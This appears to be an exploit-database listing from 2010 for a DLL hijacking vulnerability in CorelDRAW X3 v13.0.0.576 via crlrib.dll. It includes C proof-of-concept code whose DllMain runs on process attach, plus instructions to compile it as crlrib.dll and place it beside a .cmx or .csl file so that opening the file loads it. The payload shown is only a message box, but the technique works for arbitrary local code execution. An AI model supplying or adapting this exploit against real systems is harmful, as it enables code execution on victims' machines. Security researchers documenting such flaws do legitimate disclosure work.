CorelDRAW X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)

2010-08-25T00:00:00
ID 1337DAY-ID-13855
Type zdt
Reporter LiquidWorm
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ===========================================================
CorelDRAW X3 v13.0.0.576 DLL Hijacking Exploit (crlrib.dll)
===========================================================

/*
 
 CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit
 
 Vendor: Corel Corporation
 Product Web Page: http://www.corel.com
 Affected Version: X3 v13.0.0.576
 
 Summary: Graphic design software for striking visual communication.
 
 Desc: CorelDRAW X3 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .cmx and .csl thru crlrib.dll library.
 
 ----
 gcc -shared -o crlrib.dll coreldrw.c
 
 Compile and rename to crlrib.dll, create a file test.cmx or test.csl and
 put both files in same dir and execute.
 ----
 
 Tested on Microsoft Windows XP Professional SP3 (EN)
 
 
 
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com
 
 Zero Science Lab - http://www.zeroscience.mk
 
 
 25.08.2010
 
*/
 
 
#include <windows.h>
 
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
 
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_mll();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
 
    return TRUE;
}
 
int dll_mll()
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}



#  0day.today [2018-03-19]  #